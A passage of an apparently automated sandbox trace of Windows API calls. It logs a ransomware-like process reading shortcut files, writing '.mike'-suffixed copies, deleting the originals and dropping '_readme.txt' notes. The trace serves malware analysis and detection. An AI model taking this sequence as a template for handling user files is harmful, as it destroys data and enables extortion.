dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.176] GetFileType (hFile=0x1c8) returned 0x1 [0158.177] GetFileType (hFile=0x1c8) returned 0x1 [0158.177] CloseHandle (hObject=0x1c8) returned 1 [0158.177] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.178] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x217af44 | out: lpFileInformation=0x217af44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de234aa, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122)) returned 1 [0158.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x217b2b8 | out: lpFileInformation=0x217b2b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de234aa, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122)) returned 1 [0158.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af044 | out: lpFileInformation=0x2af044*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.181] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.182] GetFileType (hFile=0x1c8) returned 0x1 [0158.182] GetFileType (hFile=0x1c8) returned 0x1 [0158.182] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x0 [0158.183] WriteFile (in: hFile=0x1c8, lpBuffer=0x217c390*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x217c390*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0158.184] CloseHandle (hObject=0x1c8) returned 1 [0158.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0158.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x217be04 | out: lpFileInformation=0x217be04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de234aa, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122)) returned 1 [0158.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0158.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0158.184] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.184] GetFileType (hFile=0x1c8) returned 0x1 [0158.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0158.184] GetFileType (hFile=0x1c8) returned 0x1 [0158.184] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefe4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aefe4*=0) returned 0x0 [0158.184] ReadFile (in: hFile=0x1c8, lpBuffer=0x217d4ec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aeff0, lpOverlapped=0x0 | out: lpBuffer=0x217d4ec*, lpNumberOfBytesRead=0x2aeff0*=0x122, lpOverlapped=0x0) returned 1 [0158.185] CloseHandle (hObject=0x1c8) returned 1 [0158.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0158.186] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.186] GetFileType (hFile=0x1c8) returned 0x1 [0158.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0158.186] GetFileType (hFile=0x1c8) returned 0x1 [0158.186] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x220 [0158.186] WriteFile (in: hFile=0x1c8, lpBuffer=0x2180ad4*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x2180ad4*, lpNumberOfBytesWritten=0x2aefe4*=0x130, lpOverlapped=0x0) returned 1 [0158.186] CloseHandle (hObject=0x1c8) returned 1 [0158.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0158.526] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.527] GetFileType (hFile=0x1c8) returned 0x1 [0158.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0158.527] GetFileType (hFile=0x1c8) returned 0x1 [0158.528] WriteFile (in: hFile=0x1c8, lpBuffer=0x2183d34*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2183d34*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0158.532] CloseHandle (hObject=0x1c8) returned 1 [0158.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0158.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27908d00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27908d00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c74ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x350)) returned 1 [0158.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0158.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0158.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.mike"), fInfoLevelId=0x0, lpFileInformation=0x21855e0 | out: lpFileInformation=0x21855e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27908d00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27908d00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c74ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x350)) returned 1 [0158.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0158.534] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", dwFileAttributes=0x80) returned 1 [0158.534] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 1 [0158.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0158.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0158.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0158.536] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.537] GetFileType (hFile=0x1c8) returned 0x1 [0158.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0158.537] GetFileType (hFile=0x1c8) returned 0x1 [0158.537] WriteFile (in: hFile=0x1c8, lpBuffer=0x21873ec*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x21873ec*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0158.538] CloseHandle (hObject=0x1c8) returned 1 [0158.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0158.539] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.539] GetFileType (hFile=0x1c8) returned 0x1 [0158.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0158.539] GetFileType (hFile=0x1c8) returned 0x1 [0158.539] CloseHandle (hObject=0x1c8) returned 1 [0158.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0158.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0158.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), fInfoLevelId=0x0, lpFileInformation=0x218aa94 | out: lpFileInformation=0x218aa94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de6f76b, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110)) returned 1 [0158.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0158.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0158.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), fInfoLevelId=0x0, lpFileInformation=0x218ae14 | out: lpFileInformation=0x218ae14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de6f76b, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110)) returned 1 [0158.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0158.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0158.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0158.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0158.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0158.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0158.543] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.544] GetFileType (hFile=0x1c8) returned 0x1 [0158.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0158.544] GetFileType (hFile=0x1c8) returned 0x1 [0158.544] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x0 [0158.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0158.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0158.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0158.547] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.547] GetFileType (hFile=0x1c8) returned 0x1 [0158.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0158.547] GetFileType (hFile=0x1c8) returned 0x1 [0158.547] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefe4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aefe4*=0) returned 0x0 [0158.548] ReadFile (in: hFile=0x1c8, lpBuffer=0x218d09c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aeff0, lpOverlapped=0x0 | out: lpBuffer=0x218d09c*, lpNumberOfBytesRead=0x2aeff0*=0x110, lpOverlapped=0x0) returned 1 [0158.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0158.549] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.550] GetFileType (hFile=0x1c8) returned 0x1 [0158.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0158.550] GetFileType (hFile=0x1c8) returned 0x1 [0158.550] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x220 [0158.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0158.551] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.551] GetFileType (hFile=0x1c8) returned 0x1 [0158.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0158.551] GetFileType (hFile=0x1c8) returned 0x1 [0158.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0158.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0158.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0158.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0158.554] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", dwFileAttributes=0x80) returned 1 [0158.555] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 1 [0158.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0158.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0158.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0158.557] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.558] GetFileType (hFile=0x1c8) returned 0x1 [0158.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0158.558] GetFileType (hFile=0x1c8) returned 0x1 [0158.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.559] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x27c74ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c9ae00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.560] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de4960a, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e1692f0, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.560] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27908d00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27908d00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c74ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk.mike", cAlternateFileName="SHOWSD~1.MIK")) returned 1 [0158.561] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0158.561] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c74ca0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27c74ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c9ae00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk.mike", cAlternateFileName="WINDOW~1.MIK")) returned 1 [0158.562] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c74ca0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27c74ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c9ae00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0158.562] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c74ca0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27c74ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27c9ae00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0158.562] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.571] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.571] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.572] CoTaskMemFree (pv=0x508980) [0158.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.573] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.573] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, 